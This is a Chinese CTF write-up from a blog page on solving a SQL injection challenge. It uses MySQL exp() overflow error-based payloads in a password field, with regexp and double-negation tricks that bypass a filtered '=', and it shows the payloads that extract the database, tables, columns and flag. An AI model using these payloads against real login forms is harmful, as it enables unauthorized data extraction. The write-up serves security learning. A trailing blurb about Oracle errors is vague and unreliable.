加了料的报错注入 - exp报错解法

最新推荐文章于 2024-10-09 15:31:37 发布

「已注销」

最新推荐文章于 2024-10-09 15:31:37 发布

阅读量330

点赞数

本文链接：https://blog.csdn.net/qingchenldl/article/details/84576415

版权

加了料的报错注入 - exp报错解法

原题链接

http://ctf5.shiyanbar.com/web/baocuo/index.php

分析

exp测试一下(因为#之类的注释符被过滤，注意闭合)：

username=&password='or exp() or '

查数据库：

username=&password=' or  exp(~(select * from(select database())x)) or'

查表

username=&password=' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema regexp database())a)) or '  #利用这则表达式代替过滤的'='

username=&password=' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where !(table_schema <> database()))a)) or '  #利用非非逆否命题绕过 '='

DOUBLE value is out of range in 'exp(~((select 'ffll44jj,users' from dual)))'

查列名

username=&password=' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where !(table_name <> 'ffll44jj'))a)) or '  # 利用非非逆否命题绕过 '='

username=&password=' or exp(~(select * from(select group_concat(column_name) from  information_schema.columns where table_name regexp 'ffll44jj')a)) or '    #利用正则表达式绕过过滤‘=’

DOUBLE value is out of range in 'exp(~((select 'value' from dual)))'

查数据

username=&password=' or exp(~(select * from(select value from  ffll44jj)z)) or '

DOUBLE value is out of range in 'exp(~((select 'flag{err0r_b4sed_sqli_+_hpf}' from dual)))'

flag

flag{err0r_b4sed_sqli_+_hpf}

知识点

exp 溢出报错注入

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

【漏洞挖掘】——109、EXP报错注入深入刨析

Fly_鹏程万里

06-21

159

函数用法：exp(x)函数功能：返回e的x次方。

mysql漏洞函数xpath_【漏洞汇总】SQL 注入漏洞之 mysql

weixin_35917998的博客

01-19

548

日期：2019-07-23 19:55:59更新：2019-08-02 10:40:37作者：Bay0net介绍：Mysql 注入笔记0x01、基本信息1.1 基本术语数据库: 数据库是一些关联表的集合。数据表: 表是数据的矩阵。在一个数据库中的表看起来像一个简单的电子表格。列: 一列(数据元素) 包含了相同类型的数据, 例如邮政编码的数据。行：一行(=元组，或记录)是一组相关的数据，例如一条用...

参与评论您还未登录，请先登录后发表或查看评论

MYSQL 通过exp()报错注入

Ciyaso的博客

01-16

4114

代码解释 exp()数学函数，用于计算e的x次方的函数。约束条件 5.5<mysql版本<5.6 原理 exp是以e为底的指数函数，但是，由于数字太大是会产生溢出。这个函数会在参数大于709时溢出，报错。将0按位取反就会返回“18446744073709551615”，再加上函数成功执行后返回0的缘故，我们将成功执行的函数取反就会得到最大的无符号BIGINT值。我们通过子查询与按位求反，造成一个DOUBLE overflow error，并借由此注出数据。从而实现了报错注入。

【exp报错注入】

最新发布

My笔记的博客

10-09

841

23是加号的意思这里的意思是709+4，那么为什么要把+号编码呢？我们看到上面payload里的。这里我们是从大到小猜的，

加了料的报错注入-实验吧

Xi4or0uji

06-05

892

去fuzz一下waf可以看到username不能用括号，然鹅password不能用floor,updatexml,polygon,multipoint,extractvalue,geometrycollection,multinestring,mulpolygon,linestring这些报错函数所以...........怎么注入？！...

mysql exp注入_Mysql注入之exp报错注入

weixin_39630466的博客

01-21

476

Author：SilentDATE：2017-11-17Warning：实操部分需实现效果，不然就是失败的实验；前言：好消息好消息～作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据，当我们拿到MySQL里的函数时，作者比较感兴趣的是其中的数学函数，它们也应该包含一些数据类型来保存数值。所以作者就跑去测试看哪些函数会出现溢出错误。然后作者发现，当传递一个大于709...

Sqli - labs实战笔记

浪子燕青的博客

02-25

527

Sqli - labs 安装与lesson1-4实战所需环境：１．　PHP ２．　MYSQL ３．　Apache/Nginx 以上三项Debian都自带了，２与３直接开启即可，但是有几点要注意：１．　Debian下的MySql每次登录的时候默认需要授权，即必须使用sudo，可以修改配置文件忽略默认授权，修改方法在之前的文件有提起过．２．　Apache存放文件放在/var/www/html/目录下３．　sqli-labs　使用的PHP5编写的，但是Debian默认安装PHP７，兼..

BUUCTF-模板注入专项刷题

m0_51563147的博客

02-27

3458

SSTI：目录简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行，但是题目过滤的不够严格导致.

SQL注入学习—sqlilabs环境搭建以及代码审计（1—10关代码详解）持续更新1-65关

qq_53717877的博客

10-13

959

目录环境搭建 SQL注入概念讲解代码审计 Less1: 源码讲解 Less2 源码讲解 Less3 源码讲解 Less4 源码讲解 Less5 源码讲解 Less6 源码讲解 Less7 源码讲解 Less8 源码讲解 Less9 源码讲解 Less10 源码讲解环境搭建 Github上直接搜索sqli-labs直接会有源码，php、asp版本的都有，我这是使用的一个php经典版本，sql注入必备 Github链接：https://gith...

WEB安全之：Mysql 数据库 SQL 注入(二)

f_carey的博客

06-01

856

郑重声明：本笔记编写目的只用于安全知识提升，并与更多人共享安全知识，切勿使用笔记中的技术进行违法活动，利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责，共同维护网络文明和谐。 Mysql 数据库 SQL 注入（二）3 Mysql 查询信息3.1 `union` 联合查询注入方法3.1.1 猜测表字段数3.1.2 查询数据库系统信息3.1.3 查询表名查询表字段名称3.1.4 查询表数据3.2 `exists ()` 布尔型注入查询方法3.2.1 查询表名3.2.2 查询表字段.

sql注入分类及报错注入EXP

weixin_45626840的博客

01-20

709

sql注入分类原理，报错注入原理，EXP编写

加了料的报错注入SQL

雨九九的小窝

10-25

366

地址： http://ctf5.shiyanbar.com/web/baocuo/index.php 参考资料：https://www.jianshu.com/p/95f18a32ec7b https://blog.csdn.net/he_and/article/details/80572740 源码中的有用信息：要用post提交username和password，所以用burp 爆出当前...

CTF-加了料的报错注入 WP

05-16

450

加了料的报错注入 分值：35 flag格式：flag{xxx} 解题链接：http://ctf5.shiyanbar.com/web/baocuo/index.php 1.寻找解题思路首先打开页面，如图：提示让你登陆，参数以post方式提交，右键查看源代码，发现sql语句： $sql="select * from users where username='$u...

实验吧——加了料的报错注入(exp报错注入)

weixin_30482383的博客

10-08

276

题目地址：http://ctf5.shiyanbar.com/web/baocuo/index.php 先查看页面源码得到提示知道了后台执行的sql语句,很常规的查询测试了一个报错函数发现如下回显，可见屏蔽了报错信息，也有可能是监测到了updatexml这个报错函数，于是先用burp来fuzzing测试一波，看看哪些关键字被屏蔽了 burp抓包并send to intru...

实验吧——加了料的报错注入

xiaoyuer0123的博客

09-02

229

# -*- coding:utf8 -*- import requests import re def denglu(username,password): # 设置代理，用于调试过程中抓包分析 proxies = { "http": "http://localhost:9008", "https": "http://localhost:9008"...

实验吧 加了料的报错注入

JacobTsang的博客

10-29

266

注意GET请求和POST请求包头的区别否则参数传递不到后台 GET请求： Content-Type: application/json POST请求： Content-Type:application/x-www-form-urlencoded 构造字典扫一下注入点过滤了哪些关键字： xpath injection 报错注入分析之updatexml注入链接：http://www.mami...

实验吧 WEB 加了料的报错注入

fr4granc3

01-28

1468

没有用户名和密码的输入框，因此不能直接在URL中传递username和password参数。要使用hackbar或者burpsuit传。（还不太理解为什么）首先尝试username=1&amp;password=1，提示Login failed。尝试username='or'1&amp;password='or'1，提示You are our member, welcome to ...

暑期练习web8：加了料的报错注入（实验吧）

qq_41618162的博客

08-17

1014

解题连接：ht=tp://ctf5.shiyanbar.com/web/baocuo/index.php 进入解题首页面就出现tips让我们post给username和password传值随便传个值试试只报了登陆失败的字样换成username=’&password=5就说我有sql语法错误，说明这题是要考虑sql注入的然后用burpsuite检测许多sql相关的词，看...

（转载）使用exp进行SQL报错注入

weixin_33890499的博客

05-19

299

此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践 from:https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/ 0x01 前言概述好消息好消息～作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出...

oracle 6508,exp 报错 ORA-6508， ORA-6512

06-03

ORA-6508 是 Oracle 数据库中的一个错误代码，表示在执行某个语句时发生了类型不匹配的错误。而 ORA-6512 则表示在执行某个语句时发生了一个未知的错误。这两个错误通常会同时出现，因为 ORA-6512 是一个通用的错误代码，可以表示各种不同的错误。要解决这个问题，首先需要确定哪个语句触发了这个错误。可以查看数据库的日志文件或者执行过程中的错误堆栈信息来找到具体的语句。然后需要检查这个语句中的数据类型是否正确，以及数据类型的长度是否符合要求。如果数据类型不匹配或者长度不正确，就需要修改语句中的数据类型或者数据长度，并重新执行。如果修改数据类型或者数据长度后仍然出现这个错误，就需要进一步检查数据库中的数据是否正确。可以使用一些工具来检查数据的完整性和正确性，例如 Oracle 提供的数据验证工具或者第三方的数据库工具。如果发现数据有问题，就需要修复数据并重新执行语句。总之，要解决 ORA-6508 和 ORA-6512 错误，需要仔细检查语句中的数据类型和数据长度，并确保数据库中的数据正确无误。如果无法解决问题，可以考虑联系 Oracle 技术支持部门寻求帮助。